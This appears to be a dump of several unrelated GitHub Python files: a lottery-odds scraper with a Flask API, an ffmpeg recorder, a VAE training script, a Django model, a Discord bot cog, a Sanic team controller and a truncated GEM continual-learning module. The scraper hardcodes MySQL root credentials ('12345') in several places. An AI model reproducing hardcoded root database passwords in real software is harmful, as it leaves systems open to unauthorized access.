solution\"])\nplt.tight_layout()\nplt.show()\n","repo_name":"Desno365/location-aware-edge-api","sub_path":"evaluation/python-simulator/src/simulation_read_district_level_clients_ratio.py","file_name":"simulation_read_district_level_clients_ratio.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} {"seq_id":"73091317288","text":"import requests\nfrom flask import Flask, jsonify, request\nimport re\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom mysql.connector import MySQLConnection, Error\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom flask_cors import CORS\n\nimport mysql.connector\n\napp = Flask(__name__)\nCORS(app) \n\n\n\n# Establishes a connection with CA Lottery website, uses Selenium to cycle pages and scratchers, \n# and Beautiful Soup to parse for info\ndef retrieve_scratcher():\n\n # initialize webdriver\n options = webdriver.ChromeOptions()\n 
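# Headless-Chrome setup: '--headless=new' requires a recent Chrome build (older versions use plain '--headless'), and the 'eager' page-load strategy returns control once the DOM is ready instead of waiting for every resource.\n 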
options.add_argument('--ignore-certificate-errors')\n options.add_argument('--incognito')\n options.page_load_strategy = 'eager'\n options.add_argument('--headless=new')\n driver = webdriver.Chrome(options=options)\n\n \n driver.get(\"https://www.calottery.com/scratchers\")\n\n scratcher_info = []\n\n for i in range(2, 7):\n \n \n #Find page buttons\n pages = driver.find_elements(By.CLASS_NAME, \"page-link\")\n\n #initialize BeautifulSoup, find links to all scratcher pages\n main_page = driver.page_source\n soup = BeautifulSoup(main_page, 'html.parser')\n results = soup.find(id=\"scratchers-results\")\n cards = results.find_all(\"a\", href=True)\n\n\n #Scrape the URL for each scratcher\n for card in cards:\n href = card.get(\"href\")\n try:\n #find scratcher info and add it to list\n scratcher_info.append(get_info(\"https://www.calottery.com\" + href))\n except Exception as e:\n print(e)\n continue\n\n \n \n\n \n driver.execute_script(\"arguments[0].click();\", pages[i])\n\n #wait for page to load\n time.sleep(1)\n\n driver.close()\n\n #insert scratcher info into MySQL table\n\n sql = \"INSERT INTO scratchers (scratcher_name, price, odds, Top_Prize, Top_Prizes_left, Top_Prize_Odds, img_source) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s) \" \\\n \"ON DUPLICATE KEY UPDATE odds = VALUES(odds), \" \\\n \"Top_Prizes_left = VALUES(Top_Prizes_left), \" \\\n \"Top_Prize_Odds = VALUES(Top_Prize_Odds)\"\n \n cnx = mysql.connector.connect(\n host='localhost',\n user='root',\n password='12345',\n database='scratchers'\n )\n\n #connect to server\n if cnx.is_connected():\n print('Connected to MySQL server')\n\n cursor = cnx.cursor()\n\n #Execute query\n cursor.executemany(sql, scratcher_info)\n\n cnx.commit()\n\n cursor.close()\n cnx.close() \n\n #print(scratcher_info)\n\n\n#Scrapes scratcher page for info, such as odds, name, price, prizes, and img source\ndef get_info(URL):\n \n page = requests.get(URL)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n\n results = soup.find(id=\"content\")\n\n #Retrieve name\n scratcher_name = results.find(\"h1\", class_=\"page-title--text field-title\")\n print(scratcher_name.text)\n \n\n #Retrieve odds\n odds = results.find(\"p\", class_=\"scratchers-game-detail__info-feature-item scratchers-game-detail__info-feature-item--cash-odds\")\n \n odds_string = str(odds.text)\n\n colon_index = odds_string.index(\":\")\n substring = odds_string[colon_index + 1:].strip()\n\n #Parse integer from statement\n parts = substring.split(\"in\")\n\n # Turn odds string into decimal\n integer_part = parts[0].strip()\n float_part = parts[1].strip()\n\n integer_value = int(integer_part)\n float_value = float(float_part)\n\n #Odds in decimal form\n decimal_result = integer_value / float_value\n\n print(\"Odds: \" + str(decimal_result))\n\n \n #Retrieve Top Prize, Top Prize Odds, Top Prizes Left \n\n prize = results.find(\"tr\", class_=\"odds-available-prizes__table__body\")\n\n #Parse lines for relevant information\n lines = prize.text.splitlines()\n print(\"Top prize: $\" + lines[1])\n prize_num = int(''.join(filter(str.isdigit, lines[1])))\n\n print(\"Top Prize Odds: 1 in \" + str(lines[2]))\n match = re.search(r'\\d+', lines[4])\n\n if match:\n first_number = int(match.group())\n\n print(\"Top prizes left: \" + str(first_number))\n\n #Retrieve Image Source\n img = results.find(\"img\", class_=\"scratchers-game-detail__card-img scratchers-game-detail__card-img--unscratched\")\n \n src = img.get(\"src\")\n print(\"Image source: \" + str(src))\n\n #Retrieve Price\n price = 
results.find(\"p\", class_=\"scratchers-game-detail__info-price\")\n price_str = str(price.text)\n\n colon_index = price_str.index(\"$\")\n substring = price_str[colon_index + 1:].strip()\n\n print(\"Price: $\" + str(substring))\n print(\"\")\n return (scratcher_name.text, substring, decimal_result, prize_num, first_number, lines[2], src)\n\n#API call will return scratchers with best odds at requested price point\n\n\n\n@app.route('/api/scratchers/best-odds', methods=['GET'])\ndef get_scratcher_with_best_odds():\n try:\n \n scratcher_best_odds = []\n # Get the price point from the query parameters\n\n prices = request.args.get('prices').split(',')\n # Establish a connection to the MySQL server\n cnx = mysql.connector.connect(\n host='localhost',\n user='root',\n password='12345',\n database='scratchers'\n )\n # Create a cursor object \n cursor = cnx.cursor()\n print(prices)\n\n # Execute a SELECT query to fetch the scratcher with the best odds at the specified price point\n for price in prices:\n query = \"SELECT * FROM scratchers WHERE price = %s ORDER BY odds DESC LIMIT 1\"\n cursor.execute(query, (price,))\n\n # Fetch the row of the result\n row = cursor.fetchone()\n\n # Check if a scratcher was found at the specified price point\n if row is not None:\n scratcher_best_odds.append({\n 'scratcher_name': row[0],\n 'price': row[1],\n 'odds': row[2],\n 'Top_Prize': row[3],\n 'Top_Prizes_Left': row[4],\n 'Top_Prize_Odds': row[5],\n 'img_source': row[6],\n })\n cursor.close()\n cnx.close()\n print(scratcher_best_odds)\n return jsonify(scratcher_best_odds), 200\n\n except mysql.connector.Error as err:\n # Handle MySQL errors and return appropriate error code and message\n error_message = \"There was an error retrieving scratcher data from MySQL database\"\n return jsonify({'error': error_message}), 500\n\n except Exception as e:\n # Handle other unexpected exceptions and return a generic error response\n err = \"error\"\n return jsonify({'An error occurred': err}), 500\n\n\n#Retrieve MySQL scratcher table\n@app.route('/api/scratchers', methods=['GET'])\ndef get_scratchers():\n try:\n app = Flask(__name__)\n\n cnx = mysql.connector.connect(\n host='localhost',\n user='root',\n password='12345',\n database='scratchers'\n )\n \n # Create a cursor object\n cursor = cnx.cursor()\n \n # Execute a SELECT query to fetch data from the table\n query = \"SELECT * FROM scratchers\"\n cursor.execute(query)\n \n # Fetch all rows of the result\n rows = cursor.fetchall()\n \n # Convert the rows to a list of dictionaries\n data = []\n for row in rows:\n data.append({\n 'scratcher_name': row[0],\n 'price': row[1],\n 'odds': row[2],\n 'Top_Prize': row[3],\n 'Top_Prizes_Left': row[4],\n 'Top_Prize_Odds': row[5],\n 'img_source': row[6],\n })\n \n # Close the cursor and connection\n cursor.close()\n cnx.close()\n\n print(data)\n \n # Return the data as JSON\n return jsonify(data), 200\n\n except mysql.connector.Error as err:\n # Handle MySQL errors and return appropriate error code and message\n error_message = \"There was an error retrieving scratcher data from MySQL database\"\n return jsonify({'error': error_message}), 500\n\n except Exception as e:\n # Handle other unexpected exceptions and return a generic error response\n return jsonify({'error': 'An error occurred.'}), 500\n \n\n\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef catch_all(path):\n # Return a custom error response for the undefined routes\n return jsonify({'error': 'Route not found'}), 
404\n\n\napp.run()\n","repo_name":"SamAbdel/CA-Scratcher-Tracker","sub_path":"Scratcher_API.py","file_name":"Scratcher_API.py","file_ext":"py","file_size_in_byte":8681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71390564968","text":"from os.path import join as pjoin\nfrom pathlib import Path\nfrom PIL import Image\nimport os\nimport numpy as np\n\ndef save_imgs_to_video(output_path=\"video\", video_name=\"\"):\n os.system(f\"ffmpeg -framerate 30 -pattern_type glob -i '{output_path}/*.png' -c:v libx264 -pix_fmt yuv420p {video_name}.mp4 > /dev/null 2>&1\")\n # os.system(f\"rm -r {output_path}\")\n\nclass SimpleVideoRecorder():\n def __init__(self, camera, output=\"output.mp4\"):\n self.camera = camera\n self.counter = 0\n tmp = Path(output.parent) / \"tmp\" \n if not tmp.exists():\n # tmp.mkdir()\n tmp.mkdir(parents=True, exist_ok=True)\n self.folder = tmp\n self.output_fname = output\n\n def render(self):\n self.camera.take_picture()\n color = self.camera.get_color_rgba()\n fname = self.folder / f\"output-{self.counter:04d}.png\"\n Image.fromarray((color[..., :3].clip(0, 1) * 255).astype(np.uint8)).save(fname)\n self.counter = self.counter + 1\n\n def dump(self):\n fpath = self.folder.absolute()\n os.system(f\"ffmpeg -framerate 30 -pattern_type glob -i '{fpath}/output-*.png' -c:v libx264 -pix_fmt yuv420p {self.output_fname}.mp4 > /dev/null 2>&1\")\n os.system(f\"rm -r {fpath}\")","repo_name":"geng-haoran/GraspPolicy","sub_path":"utils/visu.py","file_name":"visu.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71252771368","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\ndef mock_data(min_val=0, center=3., df=3, size=10000):\n p = np.random.chisquare(df=df, size=size) \n p = p * ((center-min_val) * 1. 
/ df) + min_val\n p = p.astype(int)\n return p\n\n\n\ndef height_weight_mock(min_height=145, mid_height=175, df=6, size=1000):\n h = mock_data(min_val=min_height, center=mid_height, df=df, size=size)\n h[h>220] = mid_height + int(np.random.normal(scale=5))\n w = h - 105\n w = w + np.random.normal(scale=w/5.) # not +=: adding float noise in place into an int array raises a casting error\n return h, w\n\n\n\n\ndef height_weight_file(save_path, size=1000):\n h, w = height_weight_mock(size=size)\n i = np.arange(1, size+1)\n d = np.hstack((i.reshape(-1, 1), \n h.reshape(-1, 1), \n w.reshape(-1, 1)))\n np.savetxt(save_path, d, fmt='%s')","repo_name":"KG-book/EntityMining","sub_path":"chapter2/src/mock_data.py","file_name":"mock_data.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} {"seq_id":"11729176106","text":"#!/usr/bin/env python3\n\nimport argparse\nparser = argparse.ArgumentParser(description=\"\"\"\ntrains a variational autoencoder on text.\nlogs validation statistics per 250 steps;\nsaves a checkpoint per 10000 steps aka one round;\nthe checkpoints are named after the trial name and the training round.\ndetails are specified in the config file.\n\"\"\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--trial', default=\"master\", help=\"the trial name\")\nparser.add_argument('--config', default=\"config.json\", help=\"the config file\")\nparser.add_argument('--ckpt', default=None, help=\"the checkpoint to resume\")\nparser.add_argument('--gpu', default=\"0\", help=\"the gpu to use\")\nparser.add_argument('--seed', default=0, type=int, help=\"random seed\")\nparser.add_argument('--rounds', default=0, type=int, help=\"number of training rounds\")\nparser.add_argument('--prefetch', default=16, type=int, help=\"number of batches to prefetch\")\nparser.add_argument('--sample', action='store_true', help=\"train with sentencepiece sampling\")\nparser.add_argument('--profile', action='store_true', help=\"run tensorboard profile\")\nA = parser.parse_args()\n\nimport sys\nif not A.rounds and not A.profile: sys.exit(\"nothing to do\")\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = A.gpu\n\n###############\n# preparation #\n###############\n\nfrom util import Record, comp\nfrom model import vAe as vae\nfrom tqdm import tqdm\nfrom util_io import pform, load_txt, load_json\nfrom util_np import np, vpack, sample, partition\nfrom util_sp import load_spm, encode_capped, encode_capped_sample_pair\nfrom util_tf import tf, pipe\n\nconfig = load_json(A.config)\nP = Record(config['paths'])\nC = Record(config['model'])\nT = Record(config['train'])\n\ntf.set_random_seed(A.seed)\n\n#############\n# load data #\n#############\n\nvocab = load_spm(P.vocab)\nvalid = np.load(P.valid)\n\ndef batch(size=T.batch_train, path=P.train, vocab=vocab, seed=A.seed, kudo=A.sample, max_len=T.max_len):\n pac = lambda arrs: vpack(arrs, (size, max(map(len, arrs))), eos, np.int32)\n enc = encode_capped_sample_pair if kudo else encode_capped\n raw = tuple(load_txt(path))\n eos = vocab.eos_id()\n bat = []\n for i in sample(len(raw), seed):\n if size == len(bat):\n if kudo:\n src , tgt = map(pac, zip(*bat))\n else:\n src = tgt = pac(bat)\n yield src, tgt\n bat = []\n bat.append(enc(vocab, raw[i], cap=max_len))\n\n###############\n# build model #\n###############\n\nmodel_valid = vae('valid', **C)\n\nif A.profile:\n from util_tf import profile\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n with tf.summary.FileWriter(pform(P.log, A.trial), sess.graph) as wtr:\n 
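# profile() comes from util_tf (not shown in this file); presumably it runs one traced step and writes the timing data through this FileWriter. The first 32 validation sentences serve as the probe batch.\n 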
profile(sess, wtr, model_valid.loss, {model_valid.src: valid[:32], model_valid.tgt: valid[:32]})\nif not A.rounds: sys.exit(\"profiling done\")\n\nsrc, tgt = pipe(batch, (tf.int32, tf.int32), prefetch= A.prefetch)\nmodel_train = vae('train', src=src, tgt=tgt, **C)\n\n############\n# training #\n############\n\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\nif A.ckpt:\n saver.restore(sess, pform(P.ckpt, A.ckpt))\nelse:\n tf.global_variables_initializer().run()\n\nwtr = tf.summary.FileWriter(pform(P.log, A.trial))\nsummary = tf.summary.merge(\n (tf.summary.scalar('step_errt' , model_valid.errt ),\n tf.summary.scalar('step_loss_gen', model_valid.loss_gen),\n tf.summary.scalar('step_loss_kld', model_valid.loss_kld)))\n\ndef summ(step, model=model_valid):\n wtr.add_summary(\n sess.run(summary, dict(zip(\n (model.errt, model.loss_gen, model.loss_kld),\n map(comp(np.mean, np.concatenate),\n zip(*(sess.run((model.errt_samp, model.loss_gen_samp, model.loss_kld_samp),\n {model.src: valid[i:j], model.tgt: valid[i:j]})\n for i, j in partition(len(valid), T.batch_valid, discard= False))))))),\n step)\n wtr.flush()\n\nfor _ in range(A.rounds):\n for _ in range(40):\n for _ in tqdm(range(250), ncols= 70):\n sess.run(model_train.train_step)\n step = sess.run(model_train.step)\n summ(step)\n saver.save(sess, pform(P.ckpt, A.trial, step // 10000), write_meta_graph= False)\n","repo_name":"argsim/argsim","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31681947132","text":"from django.db import models\n\n\nclass List(models.Model):\n name = models.TextField(max_length=30, blank=False, null=True)\n\n\nclass Item(models.Model):\n text = models.TextField()\n list = models.ForeignKey(List, blank=False, null=True)\n\n # Create a random list if not provided\n def save(self, *args, **kwargs):\n if not self.list:\n list_ = List.objects.create()\n list_.save()\n self.list = list_\n super(Item, self).save(*args, **kwargs)\n","repo_name":"HassenPy/tdd-goat","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42103381041","text":"import asyncio\nimport aiofiles\nimport base64\nimport os\nfrom pathlib import Path\nfrom bson import ObjectId\nfrom async_files.utils import async_wraps\n\nfrom sanic.log import logger\nfrom sanic_openapi import doc\nfrom sanic.response import json, file\nfrom sanic import Blueprint\nfrom sanic.views import HTTPMethodView\n\nfrom ..util import async_rmtree\nfrom ..util.decorator import token_required\nfrom ..model.database import User, Organization, Team, Test, TestResult, TaskQueue, Task\n\nfrom ..service.auth_helper import Auth\nfrom ..util.dto import TeamDto, json_response\nfrom ..util.response import response_message, EINVAL, ENOENT, SUCCESS, EEXIST, EPERM, USER_NOT_EXIST, TOKEN_REQUIRED, TOKEN_ILLEGAL\nfrom ..config import get_config\nfrom ..util.identicon import render_identicon\n\nUSERS_ROOT = Path(get_config().USERS_ROOT)\n\n_user = TeamDto.user\n_user_list = TeamDto.user_list\n_team_list = TeamDto.team_list\n_new_team = TeamDto.new_team\n_team_id = TeamDto.team_id\n_team_avatar = TeamDto.team_avatar\n\n\nbp = Blueprint('team', url_prefix='/team')\n\nclass TeamView(HTTPMethodView):\n @doc.summary('List all teams joined by the logged in user')\n 
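# Every handler below documents the X-Token header and is wrapped in @token_required, which presumably validates the token and attaches the caller as request.ctx.user.\n 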
@doc.consumes(doc.String(name='X-Token'), location='header')\n @doc.produces(_team_list)\n @token_required\n async def get(self, request):\n ret = []\n check = []\n user = request.ctx.user\n\n async for team in Team.find({'owner': user.pk}):\n owner = await team.owner.fetch()\n organization = await team.organization.fetch()\n ret.append({\n 'label': team.name,\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'organization_id': str(organization.pk),\n 'value': str(team.id)\n })\n check.append(team)\n\n for team in user.teams:\n if team in check:\n continue\n organization = await team.organization.fetch()\n owner = await team.owner.fetch()\n ret.append({\n 'label': team.name,\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'organization_id': str(organization.pk),\n 'value': str(team.id)\n })\n\n return json(response_message(SUCCESS, teams=ret))\n\n @doc.summary('create a new team')\n @doc.description('The logged in user performing the operation will become the owner of the team')\n @doc.consumes(doc.String(name='X-Token'), location='header')\n @doc.consumes(_new_team, location='body')\n @doc.produces(json_response)\n @token_required\n async def post(self, request):\n data = request.json\n user = request.ctx.user\n\n name = data.get('name', None)\n if not name:\n return json(response_message(EINVAL, 'Field name is required'))\n\n organization_id = data.get('organization_id', None)\n if not organization_id:\n return json(response_message(EINVAL, 'Field organization_id is required'))\n \n organization = await Organization.find_one({'_id': ObjectId(organization_id)})\n if not organization:\n return json(response_message(ENOENT, 'Organization not found'))\n\n if organization.owner != user:\n return json(response_message(EINVAL, 'You are not the organization\'s owner'))\n\n team = await Team.find_one({'name': name, 'organization': organization.pk})\n if team:\n return json(response_message(EEXIST, 'Team has been registered'))\n\n team = Team(name=name, organization=organization.pk, owner=user.pk)\n team.members.append(user)\n await team.commit()\n user.teams.append(team)\n await user.commit()\n organization.teams.append(team)\n await organization.commit()\n\n team.path = name + '#' + str(team.id)\n team_root = USERS_ROOT / organization.path / team.path\n try:\n await aiofiles.os.mkdir(team_root)\n except FileExistsError as e:\n return json(response_message(EEXIST))\n\n img = await render_identicon(hash(name), 27)\n await async_wraps(img.save)(team_root / ('%s.png' % team.id))\n team.avatar = '%s.png' % team.id\n await team.commit()\n\n return json(response_message(SUCCESS))\n\n @doc.summary('delete a team')\n @doc.description('Only the owner of the team or the organization that the team belongs to can perform this operation')\n @doc.consumes(doc.String(name='X-Token'), location='header')\n @doc.consumes(_team_id, location='body')\n @doc.produces(json_response)\n @token_required\n async def delete(self, request):\n team_id = request.json.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, \"Field team_id is required\"))\n\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if not team:\n return json(response_message(ENOENT, \"Team not found\"))\n\n user = request.ctx.user\n organization = await team.organization.fetch()\n if await team.owner.fetch() != user:\n if await organization.owner.fetch() != user:\n return json(response_message(EINVAL, 'You are not the team owner'))\n\n organization.teams.remove(team)\n await organization.commit()\n\n try:\n 
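# async_rmtree (imported from ..util) is presumably an async wrapper around shutil.rmtree; a directory that was never created surfaces as FileNotFoundError and is treated as already deleted below.\n 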
await async_rmtree(USERS_ROOT / organization.path / team.path)\n except FileNotFoundError:\n pass\n\n user.teams.remove(team)\n await user.commit()\n\n async for test in Test.find({'team': team.pk}):\n async for task in Task.find({'test': test.pk}):\n async for ts in TestResult.find({'task': task.pk}):\n await ts.delete()\n await task.delete()\n await test.delete()\n async for queue in TaskQueue.find({'team': team.pk}):\n queue.to_delete = True\n queue.organization = None\n queue.team = None\n await queue.commit()\n await team.delete()\n\n return json(response_message(SUCCESS))\n\n@bp.get('/avatar/')\n@doc.summary('get the avatar of a team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.produces(_team_avatar)\n@token_required\nasync def handler(request, team_id):\n user = request.ctx.user\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if team:\n organization = await team.organization.fetch()\n async with aiofiles.open(USERS_ROOT / organization.path / team.path / team.avatar, 'rb') as img:\n _, ext = os.path.splitext(team.avatar)\n return json(response_message(SUCCESS, type=f'image/{ext[1:]}', data=base64.b64encode(await img.read()).decode('ascii')))\n return json(response_message(USER_NOT_EXIST, 'Team not found'))\n\n@bp.delete('/member')\n@doc.summary('let current logged in user quit the team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(_team_id, location='body')\n@doc.produces(json_response)\n@token_required\nasync def handler(request):\n team_id = request.json.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, \"Field team_id is required\"))\n\n team_to_quit = await Team.find_one({'_id': ObjectId(team_id)})\n if not team_to_quit:\n return json(response_message(ENOENT, \"Team not found\"))\n\n user = request.ctx.user\n\n for team in user.teams:\n if team != team_to_quit:\n continue\n if await team.owner.fetch() == user:\n return json(response_message(EPERM, \"Can't quit the team as you are the owner\"))\n team.members.remove(user)\n await team.commit()\n user.teams.remove(team)\n await user.commit()\n return json(response_message(SUCCESS))\n else:\n return json(response_message(EINVAL, \"User is not in the team\"))\n\n@bp.get('/all')\n@doc.summary('list all teams of an organization')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(doc.String(name='organization_id', description='The organization ID'))\n@doc.produces(_team_list)\n@token_required\nasync def handler(request):\n ret = []\n\n organization_id = request.args.get('organization_id', None)\n if not organization_id:\n return json(response_message(EINVAL, 'Field organization_id is required'))\n\n user = request.ctx.user\n organization = await Organization.find_one({'_id': ObjectId(organization_id)})\n if not organization:\n return json(response_message(ENOENT, 'Organization not found'))\n if user not in organization.members:\n return json(response_message(EPERM, 'You are not a member of the organization'))\n\n async for team in Team.find({'organization': ObjectId(organization_id)}):\n owner = await team.owner.fetch()\n ret.append({\n 'label': team.name,\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'organization_id': organization_id,\n 'value': str(team.pk)\n })\n return json(response_message(SUCCESS, teams=ret))\n\n@bp.post('/join')\n@doc.summary('join a team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(_team_id, 
location='body')\n@doc.produces(json_response)\n@token_required\nasync def handler(request):\n team_id = request.json.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, \"Field team_id is required\"))\n\n user = request.ctx.user\n\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if not team:\n return json(response_message(ENOENT, 'Team not found'))\n\n if user not in team.members:\n team.members.append(user)\n await team.commit()\n if team not in user.teams:\n user.teams.append(team)\n await user.commit()\n\n return json(response_message(SUCCESS))\n\n@bp.get('/users')\n@doc.summary('list all users of a team')\n@doc.consumes(doc.String(name='X-Token'), location='header')\n@doc.consumes(_team_id)\n@doc.produces(_user_list)\n@token_required\nasync def handler(request):\n user = request.ctx.user\n\n team_id = request.args.get('team_id', None)\n if not team_id:\n return json(response_message(EINVAL, 'Field team_id is required'))\n\n team = await Team.find_one({'_id': ObjectId(team_id)})\n if not team:\n return json(response_message(ENOENT, 'Team not found'))\n\n if user not in team.members:\n if user not in team.organization.members:\n return json(response_message(EPERM, 'You are not in the organization'))\n\n ret = []\n for member in team.members:\n m = await member.fetch()\n ret.append({\n 'value': str(m.pk),\n 'label': m.name,\n 'email': m.email\n })\n return json(response_message(SUCCESS, users=ret))\n\nbp.add_route(TeamView.as_view(), '/')\n","repo_name":"pansila/Auto-Test-System","sub_path":"webserver/app/main/controller/team_controller.py","file_name":"team_controller.py","file_ext":"py","file_size_in_byte":10830,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"4942510549","text":"from .models import Template\n\n\nkeys = Template.keys.all()\nmessages = Template.messages.all()\n\nsmiles = Template.smiles.all()\n\n\nclass Keys():\n MENU = keys[0].body\n START = keys[1].body\n AGE_LESS_18 = keys[2].body\n AGE_BETWEEN_18_21 = keys[3].body\n AGE_GREAT_21 = keys[4].body\n INCOME_NO_MATTER = keys[5].body\n INCOME_UP_TO_30 = keys[6].body\n INCOME_BEETWEEN_30_45 = keys[7].body\n INCOME_FROM_40 = keys[8].body\n YES = keys[9].body\n NO = keys[10].body\n\n\nclass Messages():\n QUESTION_AGE = messages[0].body\n WELCOME = messages[1].body\n QUESTION_INCOME = messages[2].body\n AGE_LESS_18 = messages[3].body\n INCOME_LESS_30_ADVICE = messages[4].body\n CASH_LINKS_LIST = messages[5].body\n ASK_FOR_LOANS = messages[6].body\n WRITE_REVIEW = messages[7].body\n LOANS_NO_RECEIVED = messages[8].body\n AFTER_WRITE_REVIEW = messages[9].body\n GOOD_BYE = messages[10].body\n\n\nclass Smiles():\n SMILE = smiles[0].body\n","repo_name":"archon1999/VKCashBot","sub_path":"app/backend/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75140482728","text":"#!/usr/bin/env python3\nimport asyncio\nimport discord\nimport os\nfrom discord.ext import commands\n\n\nclass VerifyCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n # Current Verification method\n @commands.command(aliases=[\"verification\"])\n async def verify(self, ctx, announcement_role=None):\n try:\n if str(ctx.message.channel) == os.getenv(\"WELCOME_CHANNEL\"):\n role = discord.utils.get(ctx.guild.roles, name=\"Member\")\n await ctx.message.author.add_roles(role)\n flag = 0\n if announcement_role == 
\"announcement\":\n role = discord.utils.get(ctx.guild.roles, name=\"Announcements\")\n await ctx.message.author.add_roles(role)\n flag += 1\n botchannel = discord.utils.get(ctx.message.author.guild.channels, name=os.getenv(\"BOT_COMMAND_CHANNEL\"))\n try:\n await ctx.message.author.send(\n f'Welcome to the server {ctx.message.author.mention}!\\n'\n f'We are glad to have you here. If you wanna go through quick server description please go to {botchannel.mention} '\n f'and enter command `$chdesc` to get a description of almost every channel and `$faq` to get frequently asked questions. '\n f'We hope you enjoy your stay and contribute in our community : )\\n'\n )\n except:\n await ctx.send(f'Welcome to the server {ctx.message.author}! We are glad to have you here :D\\n\\n')\n channel = discord.utils.get(ctx.message.author.guild.channels, name='verifications-help')\n if(flag==1):\n await channel.send(f'{ctx.message.author.mention} successfully verified. Roles given: `Member` and `Announcement`.')\n else:\n await channel.send(\n f\"{ctx.message.author.mention} successfully verified. Roles given `Member`.\"\n )\n else:\n await ctx.send(\"Command only works in #\"+os.getenv(\"WELCOME_CHANNEL\")+\" channel : )\")\n await asyncio.sleep(3)\n await ctx.message.delete()\n except:\n await ctx.send(\n \"Some error happened while executing the command, please reach out to moderators/admins.\"\n )\n\n\ndef setup(bot):\n bot.add_cog(VerifyCog(bot))\n print(\"Verification cog loaded\")\n","repo_name":"Fumenoid/JHDBot","sub_path":"JHDBot/cogs/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"30466892900","text":"\nfrom model.base_model import *\nimport numpy as np\nimport quadprog\n\ndef store_grad(pp, grads, grad_dims, tid):\n \"\"\"\n This stores parameter gradients of past tasks.\n pp: parameters\n grads: gradients\n grad_dims: list with number of parameters per layers\n tid: task id\n \"\"\"\n # store the gradients\n grads[:, tid].fill_(0.0)\n cnt = 0\n for param in pp():\n if param.grad is not None:\n beg = 0 if cnt == 0 else sum(grad_dims[:cnt])\n en = sum(grad_dims[:cnt + 1])\n grads[beg: en, tid].copy_(param.grad.data.view(-1))\n cnt += 1\n\n\ndef overwrite_grad(pp, newgrad, grad_dims):\n \"\"\"\n This is used to overwrite the gradients with a new gradient\n vector, whenever violations occur.\n pp: parameters\n newgrad: corrected gradient\n grad_dims: list storing number of parameters at each layer\n \"\"\"\n cnt = 0\n for param in pp():\n if param.grad is not None:\n beg = 0 if cnt == 0 else sum(grad_dims[:cnt])\n en = sum(grad_dims[:cnt + 1])\n this_grad = newgrad[beg: en].contiguous().view(\n param.grad.data.size())\n param.grad.data.copy_(this_grad)\n cnt += 1\n\n\ndef project2cone2(gradient, memories, margin=0.5, eps=1e-3):\n \"\"\"\n Solves the GEM dual QP described in the paper given a proposed\n gradient \"gradient\", and a memory of task gradients \"memories\".\n Overwrites \"gradient\" with the final projected update.\n input: gradient, p-vector\n input: memories, (t * p)-vector\n output: x, p-vector\n \"\"\"\n memories_np = memories.cpu().t().double().numpy()\n gradient_np = gradient.cpu().contiguous().view(-1).double().numpy()\n t = memories_np.shape[0]\n P = np.dot(memories_np, memories_np.transpose())\n P = 0.5 * (P + P.transpose()) + np.eye(t) * eps\n q = np.dot(memories_np, gradient_np) * -1\n G = np.eye(t)\n h = np.zeros(t) + margin\n 
v = quadprog.solve_qp(P, q, G, h)[0]\n x = np.dot(v, memories_np) + gradient_np\n gradient.copy_(torch.Tensor(x).view(-1, 1))\n\n\n\n\nclass GEM(nn.Module):\n def __init__(self, model, data, args):\n super(GEM, self).__init__()\n self.data = data\n self.n_task = args.n_task\n self.model = model(data, args)\n\n self.n_memory = args.n_memory\n self.margin = args.memory_strength\n self.cuda = args.cuda\n self.output_size = self.model.output_size\n\n\n # allocate episodic memory\n self.memory_inputs = torch.FloatTensor(self.n_task, self.n_memory, *models_setting[self.data].input_size)\n self.memory_labels = torch.LongTensor(self.n_task, self.n_memory)\n # allocate temporary synaptic memory\n self.grad_dims = []\n for param in self.parameters():\n self.grad_dims.append(param.data.numel())\n self.grads = torch.Tensor(sum(self.grad_dims), self.n_task)\n\n if self.cuda:\n self.memory_inputs = self.memory_inputs.cuda()\n self.memory_labels = self.memory_labels.cuda()\n self.grads = self.grads.cuda()\n\n self.observed_tasks = []\n self.old_task = -1\n self.mem_cnt = 0\n if self.data == 'cifar100':\n self.nc_per_task = 